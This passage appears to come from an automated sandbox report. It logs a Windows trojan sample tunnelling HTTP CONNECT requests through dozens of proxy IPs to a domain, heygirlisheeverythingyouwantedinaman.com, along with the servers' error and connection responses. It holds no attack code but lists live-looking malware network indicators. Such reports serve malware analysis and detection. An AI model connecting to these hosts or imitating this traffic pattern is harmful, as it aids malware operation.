                                                                                Feb 23, 2024 14:28:29.956248045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1069192.168.2.853261103.113.71.23010815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.970637083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1070192.168.2.85294162.171.133.6631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.989330053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.652753115 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1071192.168.2.853232124.163.236.5473025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.035093069 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:30.490818024 CET90INHTTP/1.1 200 OK
                                                                                Content-Type: application/json
                                                                                Connection: close
                                                                                Content-Length: 55


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1072192.168.2.853262200.41.148.2120005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.035648108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1073192.168.2.850166144.24.77.90555555828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.036412001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1074192.168.2.85328446.101.186.238805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.049671888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.570350885 CET831INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                Content-Length: 639
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1075192.168.2.853291184.170.248.541455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.066643953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1076192.168.2.85326454.178.159.199180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.067806005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.349622965 CET503INHTTP/1.1 400 Bad Request
                                                                                Content-Type: text/html; charset=us-ascii
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Connection: close
                                                                                Content-Length: 324
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1077192.168.2.853041218.1.200.244571145828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.068317890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.179317951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.563278913 CET180INHTTP/1.1 407 Proxy Authentication Required
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Proxy-Authenticate: Basic realm="DJHS/1.0;Your IP: 191.96.227.222"
                                                                                Proxy-Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1078192.168.2.85301943.255.113.232805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.074736118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1079192.168.2.85328166.29.128.243357135828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.083134890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.283364058 CET24INHTTP/1.1 403 #string


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1080192.168.2.85214214.207.205.5780805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.083441973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.066946030 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1081192.168.2.853267154.12.178.107299855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.087507010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1082192.168.2.85330267.201.33.10252835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.087510109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1083192.168.2.85329845.138.87.23810805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.099606991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1084192.168.2.853257218.75.102.19880005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.127501965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1085192.168.2.85327127.65.116.24310805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.134630919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1086192.168.2.853255221.2.84.42108005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.141901970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1087192.168.2.853280125.228.143.20741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.153529882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1088192.168.2.85318798.178.72.21109195828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.161364079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1089192.168.2.853279154.85.58.149805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.161669970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.487463951 CET321INHTTP/1.1 400 Bad Request
                                                                                Server: openresty/1.15.8.2
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 163
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.15.8.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1090192.168.2.853111138.117.116.30440095828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.207973003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1091192.168.2.853310121.128.194.154805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.286295891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.565830946 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1092192.168.2.850353153.127.194.62805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.286371946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.288738966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.382647038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.492213964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1093192.168.2.853334199.58.184.9741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.290559053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1094192.168.2.85335931.43.179.160805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.317356110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.404742002 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1095192.168.2.853367104.17.9.114805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.317552090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.405576944 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1096192.168.2.852388154.12.253.232622765828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.317620039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.882675886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1097192.168.2.853370172.67.209.12805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.335987091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.424139023 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1098192.168.2.85062712.218.209.130532815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.366736889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.491837025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.491924047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.492347002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1099192.168.2.853127103.235.66.19856785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
